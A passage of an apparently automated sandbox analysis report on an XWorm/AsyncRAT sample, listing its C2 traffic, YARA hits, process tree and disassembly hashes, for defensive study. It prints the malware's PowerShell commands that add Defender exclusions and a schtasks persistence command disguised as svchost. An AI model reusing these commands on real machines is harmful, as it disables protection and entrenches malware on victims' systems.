                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x40c2880x53.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40e0000x4fe.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4100000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x40a2e40x40a4002ec5ac6e7b7a6313c83f4d88c9fca786unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x40e0000x4fe0x60052f04eececa42d6aee35f662ad874d82False0.3841145833333333data3.8175729399016762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x4100000xc0x200fdd0e9535f9cb0e10cb8c9a0646b9f8eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x40e0a00x274data0.4538216560509554
                                                    RT_MANIFEST0x40e3140x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-02T20:11:58.350785+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84978845.141.26.1347000TCP
                                                    2025-01-02T20:11:58.713923+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:11:58.741684+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84978845.141.26.1347000TCP
                                                    2025-01-02T20:12:12.020324+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:12.022175+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84978845.141.26.1347000TCP
                                                    2025-01-02T20:12:12.238556+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:12.238556+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:25.101934+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:25.103841+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84978845.141.26.1347000TCP
                                                    2025-01-02T20:12:38.304580+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:38.306446+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84978845.141.26.1347000TCP
                                                    2025-01-02T20:12:42.246089+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:42.246089+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:44.916589+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.849788TCP
                                                    2025-01-02T20:12:44.917491+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84978845.141.26.1347000TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 2, 2025 20:10:42.130259991 CET4970680192.168.2.8208.95.112.1
                                                    Jan 2, 2025 20:10:42.135140896 CET8049706208.95.112.1192.168.2.8
                                                    Jan 2, 2025 20:10:42.135226011 CET4970680192.168.2.8208.95.112.1
                                                    Jan 2, 2025 20:10:42.135515928 CET4970680192.168.2.8208.95.112.1
                                                    Jan 2, 2025 20:10:42.140245914 CET8049706208.95.112.1192.168.2.8
                                                    Jan 2, 2025 20:10:42.592787981 CET8049706208.95.112.1192.168.2.8
                                                    Jan 2, 2025 20:10:42.644046068 CET4970680192.168.2.8208.95.112.1
                                                    Jan 2, 2025 20:11:45.106187105 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:11:45.111148119 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:11:45.111287117 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:11:45.155917883 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:11:45.160736084 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:11:51.136646032 CET8049706208.95.112.1192.168.2.8
                                                    Jan 2, 2025 20:11:51.136698961 CET4970680192.168.2.8208.95.112.1
                                                    Jan 2, 2025 20:11:58.350785017 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:11:58.355644941 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:11:58.713922977 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:11:58.741683960 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:11:58.746484995 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:11.551253080 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:11.556073904 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:12.020323992 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:12.022175074 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:12.026985884 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:12.238555908 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:12.284698009 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:22.599345922 CET4970680192.168.2.8208.95.112.1
                                                    Jan 2, 2025 20:12:22.604129076 CET8049706208.95.112.1192.168.2.8
                                                    Jan 2, 2025 20:12:24.753901005 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:24.759784937 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:25.101933956 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:25.103841066 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:25.108686924 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:37.957237959 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:37.962135077 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:38.304579973 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:38.306446075 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:38.311333895 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:42.246088982 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:42.300359011 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:44.566409111 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:44.571253061 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:44.916589022 CET70004978845.141.26.134192.168.2.8
                                                    Jan 2, 2025 20:12:44.917490959 CET497887000192.168.2.845.141.26.134
                                                    Jan 2, 2025 20:12:44.922324896 CET70004978845.141.26.134192.168.2.8

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 2, 2025 20:10:42.116089106 CET5974853192.168.2.81.1.1.1
                                                    Jan 2, 2025 20:10:42.123480082 CET53597481.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 2, 2025 20:10:42.116089106 CET192.168.2.81.1.1.10xb4aStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 2, 2025 20:10:42.123480082 CET1.1.1.1192.168.2.80xb4aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • ip-api.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849706208.95.112.1805280C:\Users\user\AppData\Roaming\svchost.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 20:10:42.135515928 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                    Host: ip-api.com
                                                    Connection: Keep-Alive
                                                    Jan 2, 2025 20:10:42.592787981 CET175INHTTP/1.1 200 OK
                                                    Date: Thu, 02 Jan 2025 19:10:42 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 6
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 66 61 6c 73 65 0a
                                                    Data Ascii: false


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:14:10:36
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                    Imagebase:0x490000
                                                    File size:4'238'848 bytes
                                                    MD5 hash:838F4CDBBFC3D37D94C45DA811BE76A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:14:10:36
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                    Imagebase:0x110000
                                                    File size:4'156'416 bytes
                                                    MD5 hash:C442A9B9299246B2E5683641A4341641
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 83%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:14:10:37
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0xa30000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2914398163.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 92%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:14:10:38
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                    Imagebase:0x800000
                                                    File size:4'156'416 bytes
                                                    MD5 hash:C442A9B9299246B2E5683641A4341641
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:14:10:38
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0x8f0000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:14:10:41
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:14:10:41
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:14:10:50
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:14:10:50
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:14:11:04
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:14:11:04
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:14:11:21
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:14:11:21
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:14:11:43
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0x7ff630e70000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:14:11:43
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:14:11:44
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Imagebase:0xa40000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:14:11:53
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0xf20000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:14:12:01
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0xeb0000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:14:12:01
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Imagebase:0xef0000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FFB4AD20F81 Relevance: .5, Instructions: 451COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc673779fc238c51abfd7aa35d44ed8a5d9165f4ab321d48565269a3fe3c3081
                                                      • Instruction ID: 501965d27e3f93741b37e9977d60e1661f49f62f6ac4670705c53d3a3784b0e5
                                                      • Opcode Fuzzy Hash: dc673779fc238c51abfd7aa35d44ed8a5d9165f4ab321d48565269a3fe3c3081
                                                      • Instruction Fuzzy Hash: 95410BA2B0DA895FE785AF7889592B87BE5EF59300B1400FBE449C3193DD18AC05C342
                                                      Function 00007FFB4AD210ED Relevance: .4, Instructions: 430COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4def049b26295933565fa59e40b3228adeff2e9d98204b09ad021c97e4a562b7
                                                      • Instruction ID: 216145e1ac511dfe0ae506d5f645c36834a02e604ce9108267c7272650e6c3ad
                                                      • Opcode Fuzzy Hash: 4def049b26295933565fa59e40b3228adeff2e9d98204b09ad021c97e4a562b7
                                                      • Instruction Fuzzy Hash: A431EC72B0DA895FE786BB7888696B87BE1EF5A201B1400FBE44DC3593DD189C45C312
                                                      Function 00007FFB4AD209F7 Relevance: .2, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26e9bf1d7a53a675bd63355beb9fff6825cb5dd372273c76d66d98cf12c60f07
                                                      • Instruction ID: 02633271c3a4ccd43f311af2be5a807692a86585d412fb9168b1f4ddabb00dc6
                                                      • Opcode Fuzzy Hash: 26e9bf1d7a53a675bd63355beb9fff6825cb5dd372273c76d66d98cf12c60f07
                                                      • Instruction Fuzzy Hash: FC716FB1A189099FEB99EF78C498BAD77E2FF54314F2441A9D05AD3295CF34AC41CB40
                                                      Function 00007FFB4AD20D80 Relevance: .1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d519c47d1e027fe8e9d02a7d52a9126b3b7bc252b1c5bef3a7194702b66e034b
                                                      • Instruction ID: 236e1728418a16aeb000abbc8d0e12c3148c4338a8a6a30aa892fb742cfa8c3b
                                                      • Opcode Fuzzy Hash: d519c47d1e027fe8e9d02a7d52a9126b3b7bc252b1c5bef3a7194702b66e034b
                                                      • Instruction Fuzzy Hash: F03167A284E3C25FD3436B709C764A17FB0DE5722070E44EBD4C4CB5A3D51C6A9AC762
                                                      Function 00007FFB4AD20498 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55ef5856b0494dfd9dfb3fff728e090c200f5d73444fc8b13486d1381b633477
                                                      • Instruction ID: 0a1b363bb3f50a76e67a122e777cbc9a3438a7de75e0584bed0c7acc2a5f9e1c
                                                      • Opcode Fuzzy Hash: 55ef5856b0494dfd9dfb3fff728e090c200f5d73444fc8b13486d1381b633477
                                                      • Instruction Fuzzy Hash: 6921B071B1990C5FEB85FB68C8996B977E6EFA8301B04007AE80EC3693DE24AC458745
                                                      Function 00007FFB4AD20951 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a2cab9f8af14984df3d45e9a9a51525c86900e7c9d06a9aeaa472b05e71588c
                                                      • Instruction ID: 3520e140cfce82d9ce7c44c747c6305410b0fbc043ec8315dcf7dfac9d8340a5
                                                      • Opcode Fuzzy Hash: 4a2cab9f8af14984df3d45e9a9a51525c86900e7c9d06a9aeaa472b05e71588c
                                                      • Instruction Fuzzy Hash: 631132B1D04B085FEB04DF68C85A6DEBBF0EF58300F2081AAD040E7282CB349942CB52
